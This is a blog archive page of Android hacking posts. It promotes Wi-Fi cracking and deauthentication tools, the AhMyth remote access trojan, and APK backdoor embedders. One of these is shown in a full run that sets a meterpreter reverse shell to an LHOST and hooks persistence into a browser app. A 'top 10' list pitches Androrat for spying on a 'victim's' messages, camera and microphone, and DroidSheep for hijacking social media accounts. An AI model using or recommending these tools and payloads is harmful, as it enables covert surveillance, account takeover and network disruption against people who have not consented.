Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Android Hack. Show all posts
Showing posts with label Android Hack. Show all posts

Sunday, July 8, 2018

Diggy - Extract Enpoints From APK Files


Diggy can extract endpoints/URLs from apk files. It saves the result into a txt file for further processing.


Dependencies
  • apktool

Usage
./diggy.sh /path/to/apk/file.apk
You can also install it for easier access by running install.sh
After that, you will be able to run Diggy as follows:
diggy /path/to/apk/file.apk


Share:

Monday, December 4, 2017

All-in-One Wi-Fi Cracking Tools for Android - Hijacker v1.4






Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.
This application requires an ARM android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as Xperia Z2, LG G2 etc) will work with Nexmon (it also supports some other chipsets). Devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable.
The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included.
Root is also necessary, as these tools need root to work.


Features

Information Gathering
  • View a list of access points and stations (clients) around you (even hidden ones)
  • View the activity of a specific network (by measuring beacons and data packets) and its clients
  • Statistics about access points and stations
  • See the manufacturer of a device (AP or station) from the OUI database
  • See the signal power of devices and filter the ones that are closer to you
  • Save captured packets in .cap file

Attacks
  • Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)
  • Deauthenticate a specific client from the network it's connected
  • MDK3 Beacon Flooding with custom options and SSID list
  • MDK3 Authentication DoS for a specific network or to everyone
  • Capture a WPA handshake or gather IVs to crack a WEP network
  • Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)

Other
  • Leave the app running in the background, optionally with a notification
  • Copy commands or MAC addresses to clipboard
  • Includes the required tools, no need for manual installation
  • Includes the nexmon driver and management utility for BCM4339 devices
  • Set commands to enable and disable monitor mode automatically
  • Crack .cap files with a custom wordlist
  • Create custom actions and run them on an access point or a client easily
  • Sort and filter Access Points with many parameters
  • Export all the gathered information to a file
  • Add an alias to a device (by MAC) for easier identification

Screenshots




Installation
Make sure:
  • you are on Android 5+
  • you are rooted (SuperSU is required, if you are on CM/LineageOS install SuperSU)
  • have a firmware to support Monitor Mode on your wireless interface

Download the latest version here.
When you run Hijacker for the first time, you will be asked whether you want to install the nexmon firmware or go to home screen. If you have installed your firmware or use an external adapter, you can just go to the home screen. Otherwise, click 'Install Nexmon' and follow the instructions. Keep in mind that on some devices, changing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the firmware you will land on the home screen and airodump will start. Make sure you have enabled your WiFi and it's in monitor mode.

Troubleshooting
This app is designed and tested for ARM devices. All the binaries included are compiled for that architecture and will not work on anything else. You can check by going to settings: if you have the option to install nexmon, then you are on the correct architecture, otherwise you will have to install all the tools manually (busybox, aircrack-ng suite, mdk3, reaver, wireless tools, libfakeioctl.so library) and set the 'Prefix' option for the tools to preload the library they need.
In settings, there is an option to test the tools. If something fails, then you can click 'Copy test command' and select the tool that fails. This will copy a test command to your clipboard, which you can run in a terminal and see what's wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the 'Send feedback' feature of the app in settings.
If the app happens to crash, a new activity will start which will generate a report in your external storage and give you the option to send it directly or by email. I suggest you do that, and if you are worried about what will be sent you can check it out yourself, it's just a txt file in your external storage directory. The part with the most important information is shown in the activity.
Please do not report bugs for devices that are not supported or when you are using an outdated version.
Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on your network. It's not the app's fault, it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected.

Warning

Legal
It is highly illegal to use this application against networks for which you don't have permission. You can use it only on YOUR network or a network that you are authorized to. Using a software that uses a network adapter in promiscuous mode may be considered illegal even without actively using it against someone, and don't think for a second it's untracable. I am not responsible for how you use this application and any damages you may cause.

Device
The app gives you the option to install the nexmon firmware on your device. Even though the app performs a chipset check, you have the option to override it, if you believe that your device has the BCM4339 wireless adapter. However, installing a custom firmware intended for BCM4339 on a different chipset can possibly damage your device (and I mean hardware, not something that is fixable with factory reset). I am not responsible for any damage caused to your device by this software.



Share:

Thursday, September 21, 2017

A Tool That Enumerates Android Devices For Information Useful In Understanding Its Internals And For Exploit Development - Twiga





A tool that enumerates Android devices for information useful in understanding its internals and for exploit development. It supports android 4.2 to android 7.1.1

Requirements
  • The most current ADB must be in your path and fully functional
  • The report name must not have any whitespace

Limitations
  • Some information and files cannot be pulled higher up the SDK version due to strict SELinux policies and android hardening.
  • It can only run on one device at a time for now

To Do
  • Support for enumeration on a rooted device
  • Support enumeration on multiple devices at a time
  • Generate PDF report on the enumartuon data

Inspired by




Share:

Saturday, September 9, 2017

Android application to brute force WiFi passwords (No Root Required) - WiFi Bruteforcer




WARNING: This project is still under development and by installing the app may misconfigure the Wi-Fi settings of your Android OS, a system restore may be necessary to fix it.

Android application to brute force WiFi passwords without requiring a rooted device.




Share:

Monday, July 17, 2017

Android Remote Administration Tool - AhMyth Android RAT



AhMyth Android RAT is an Android Remote Administration Tool

Beta Version
It consists of two parts:
  • Server side: desktop application based on electron framework (control panel)
  • Client side: Android application (backdoor)

Getting Started

From source code

Prerequisite :
  • Electron (to start the app)
  • Java (to generate apk backdoor)
  • Electron-builder and electron-packer (to build binaries for (OSX,WINDOWS,LINUX))
  1. git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
  2. cd AhMyth-Android-RAT
  3. npm start

From binaries

Prerequisite :

Screenshot



Video Tutorial

Share:

Thursday, December 22, 2016

shell script that simplifies the process of adding a backdoor to any Android APK file - backdoor-apk



backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

Usage:
root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie

[*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016
[+] Android payload options:
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#
The recompiled APK will be found in the 'original/dist' directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script: msfconsole -r backdoor-apk.rc


Share:

Tuesday, November 1, 2016

Android APK Backdoor Embedder - Spade



Quick and handy APK backdoor embedder with metasploit android payloads.

Requirements

Installation and execution
Then you can download smap by cloning the Git repository:
git clone https://github.com/suraj-root/spade.git
cd spade/
./spade.py

Demo video
asciicast

Video YouTube:


Share:

Monday, October 10, 2016

Top 10 Best Apps 2016 - Android Hacking



Do you wanna know how to turn your smartphone in hacking machine ? then you came at  right place . let’s talk about Top 10 Best Android Hacking Apps.

Obs, I'm not responsible for your act

Top 10 Best Android Hacking Apps

#1 Androrat

#AndroRat  ‘s meaning is  Android Remote Administration Tool. androrat is a remote administration tool which is used to control another device without physical access to victim’s device!

see features of Androrat

ºGet contacts (and all theirs informations)
ºGet call logs & Get all messages
ºLocation by GPS/Network
ºMonitoring received messages in live
ºMonitoring phone state in live (call received, call sent, call missed..)
ºTake a picture from the camera & Stream sound from microphone (or other sources..)
ºStreaming video (for activity based client only)
ºDo a toast & Send a text message
ºGive call & Open an URL in the default browser


Download Androrat



#2 DroidBox

DroidBox is developed to offer dynamic analysis of Android applications. The following information is described in the results, generated when analysis is complete:

features of Droidbox

ºHashes for the analyzed package
ºIncoming/outgoing network data
ºFile read and write operations
ºStarted services and loaded classes through DexClassLoader
ºInformation leaks via the network, file and SMS
ºCircumvented permissions
ºCryptographic operations performed using Android API
ºListing broadcast receivers
ºSent SMS and phone calls


Download DroidBox



#4 zANTI


zANTI is a penetration testing toolkit  developed by Zimperium Mobile Security for cyber security professionals. Basically, it allows you to simulate malicious attacks on a network. With the help of zANTI, you will be able to perform various types of operations such as MITM attacks, MAC address spoofing, scanning, password auditing, vulnerability checks and much more. In short, this android toolkit is a perfect companion of hackers.  How to use zANTI for Hacking .  this app is very professional in android hacking apps.




features of zANTI

ºuser can Change device’s MAC address.
ºthey can Create a malicious WiFi hotspot.
ºHijack HTTP sessions.
ºCapture downloads.
ºModify HTTP requests and responses.
ºExploit routers.
ºAudit passwords.
ºCheck a device for shellshock and SSL poodle vulnerability.


Download zANTI


#5 APK Inspector




APKinspector is a powerful GUI tool to analyse the Android apps , goal for this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code , edit remove credits license etc.


Download APK Inspector


#6 Droid Sheep

DroidSheep can use victims’ accounts, gaining access to sites that don’t use a secured and encrypted SSL connection that may make HTTPS vulnerable . DroidSheep requires root privileges. While popular sites like Yahoo, Google, and Facebook now support encrypted HTTPS connections that aren’t vulnerable to a tool like DroidSheep, there surely are hundreds of others that are.





Droidsheep apk is also a tool to hack Facebook, Twitter and many other site via your android device. Droidsheep uses the method of cookie Hijacking to hack these accounts. Droidsheep don’t reveal you the passwords and email but you can access Facebook accounts directly without them, i.e. this app provides a ink to get access to other accounts directly.this tool is beast one in the list of android hacking apps.


Download Droid Sheep



#7 Arpspoof





Arpspoof is a tool for network auditing originally written by Dug Song as a part of his dsniff package. Arpspoof  redirects traffic on the local network by forging ARP replies and sending them to either a specific target or all the hosts on the local network paths ,arpsoof in list of my favorite android hacking apps.


Download Arpspoof



#8 Nmap for Android




Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good so that was one of in android hacking apps.


Download NmapA



#9 dSploit 





dSploit is a penetration testing suite developed by Simone Margaritelli for the Android operating system. which consists of several modules that are capable to perform network security assessments on wireless networks,must read guide on


Download dSploit


#10 Wifikill

Wifi Kill Pro Hacking Tool





WiFiKill  is an android tool that you can use to disable internet connection for a device on constant WiFi network. It is a light-weight tool with simple interface , you can kick any user in same wifi network which means you can prevent your neighbors to using your wifi connection using wifikill


Download Wifi Kill Pro


By OffSec
Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition